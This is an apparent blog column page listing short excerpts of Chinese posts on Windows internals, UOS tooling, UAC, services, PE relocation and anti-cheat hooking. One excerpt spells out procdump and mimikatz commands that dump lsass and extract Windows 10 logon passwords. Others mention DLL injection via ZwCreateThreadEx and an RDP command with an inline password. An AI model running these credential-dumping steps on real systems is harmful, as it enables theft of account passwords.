安全工具
关注
分享
扫一扫
文章平均质量分 65
灰灰君呀
这个作者很懒,什么都没留下…
展开
-
office文档里面的所有元素遍历方法
1.文档调试工具:office文档中,按ALT+F11可以弹出,如下的vb调试工具界面。2.微软office文档API接口根据微软提供的office文档类说明,可以用vb或是c++的com接口,遍历或是修改里面的所有元素,效果等。例如,ispring或是aspose等和office开发相关的软件。https://docs.microsoft.com/zh-cn/office/vba/api/powerpoint.presentations.open...原创 2021-06-17 20:47:23 · 563 阅读 · 0 评论 -
PE第四节:解决随机基址或是函数随机地址问题-2
1.重定位表的修改方法,而不是修改入口点函数,根据相对地址偏移的方法。2:重定位表的内容: 第[0001]项 数据项的数据为:[0006] 数据属性为:[3] RVA的地址为:[00001006] 重定位的数据:[68264000]; RVA里面的地址相当于注册在重定位表里面,dll加载时会自动修改。...原创 2021-06-17 20:19:47 · 775 阅读 · 0 评论 -
procdump + mimikatz 获取window10系统密码的方法
1,管理员权限打开cmd,进入对应目录procdump64.exe -accepteula -ma lsass.exe lsass.dmp 导出为lsass.dump文件2,管理员权限打开mimikatz.exe执行privilege::debug;3,管理员权限打开cmd,进入对应目录把lsass.dmp放在mimikatz目录利用mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit.原创 2021-06-17 20:03:08 · 1361 阅读 · 0 评论 -
uos系统安装工具
1.安装器的流程图2.安装器单例进程安装器的单例进程,通过QtSingleApplication类实现;在pro工程文件中,加入include(../lib/qtsingleapplication/src/qtsingleapplication.pri)或是链接qtsingleapplication的库,实现QT的单例进程。示例代码如下:3.安装器的日志信息Log.cpp文件中实现了日志信息输出的接口。主要是通过在InstallLogHandler函数中,注册c...原创 2021-06-17 19:51:46 · 2004 阅读 · 0 评论 -
freerdp连接后,注销状态下未开机启动应用程序
一.RDP客户端未启动daemon程序的现象1.在uos系统里面安装freerdp的安装包,安装方法参考和信提供的RDP文档。2.通过以下RDP命令启动windows系统,会发现所有注册表里面的自启动程序都没有启动。xfreerdp /v:10.20.43.107:3389 /u:jflei /p:123注册表启动项的所有程序均未启动,是因为设置了组策略的某些安全选项。二.RDP客户端未启动daemon程序的解决方法:2.1 通过RDP命令行的方法启动程序2.1.1 用RDP测试原创 2021-06-17 19:25:31 · 897 阅读 · 0 评论 -
UAC 管理员权限 程序 防止弹窗的四种解决办法
一.启动时弹出UAC控制窗口daemon程序在注册表中设置了自启动。因此在系统启动时,由于daemon程序需要管理员权限,所以在用户登录授权后,会弹出如下的用户账户控制窗口。该弹出的UAC窗口,如果用户不手动点击确认按钮,会导致程序启动失败。实际应用中的情况是RDP远程启动时,出现该程序启动失败的现象。二.解决弹框的方法2.1 方法一:系统和安全控制打开控制面板 => 系统和安全 => 从不通知2.2 方法二:注册表修改参考文档:https://blog.cs原创 2021-06-17 19:20:40 · 10716 阅读 · 0 评论 -
映像劫持,windows服务启动的两种形式
1 服务控制管理器(services.exe)1.1 dll类型的服务该类型的服务,可以通过svchost.exe通过命令行的方式启动。ZwCreateThreadEx函数是比CreateRemoteThread更底层的函数,可以注入dll到服务程序中。ZwCreateThreadEx函数没有在ntdll.dll中声明,所以需要使用GetProcAddress从ntdll.dll中获取该函数的导出地址。以上几个服务启动的命令行如下:C:\Windows\System32\svchost.原创 2021-06-17 17:55:33 · 1946 阅读 · 0 评论 -
windows启动顺序大概流程和服务程序遇到的问题
1.服务程序目前遇到的问题(1)服务程序无法监控剪贴板;(2)服务程序无法设置挂载的磁盘卷标;(3)服务端发到客户端的thritf消息,调用剪贴板写入时会提示com失败的问题;2.服务程序的启动顺序参考文档:https://blog.youkuaiyun.com/singleyellow/article/details/104031963/电脑开机后,大致的启动顺序是BIOS—>MBR—>活动分区—>Ntoskrnl.exe、HAL—>服务类型为0、1的服务—>会话原创 2021-06-17 17:50:49 · 2270 阅读 · 0 评论 -
对运行中的进程保护
也许大家也是研究腾讯游戏的爱好者,对腾讯的游戏都有过这样的体会例如OD与CE无法进行如以下操作:(1)无法附加进程,(2)无法打开进程,(3)游戏进程被隐藏无法在工具中查看到,(4)内存无法读取代码(5)内存修改后游戏掉线 (6)无法双机进行调试(7)出现SX非法模块提示 `例如DNF的TP保护就是HOOK了以下几个API函数来禁止上面刚才说的那些: NtOpe...转载 2019-12-05 14:41:50 · 623 阅读 · 0 评论 -
基于lsp劫持或hook api的方式的代理客户端
一:程序内部通过sock5,打通网络;1:写一个简单的tcp服务端和客户端连接。 地址都是绑定 127.0.0.1的,所以两个exe程序,放在同一个系统里面是可以通信的;2:把服务端放在你的实体机,客户端放在虚拟机,这时候连接是不通的。然后,你就要想怎么把它们打通。3:服务端加上代理服务的exe,客户端修改代码,进行sock5的代理协议编写.===》 a:sock5验证;...原创 2020-08-25 14:54:08 · 1258 阅读 · 0 评论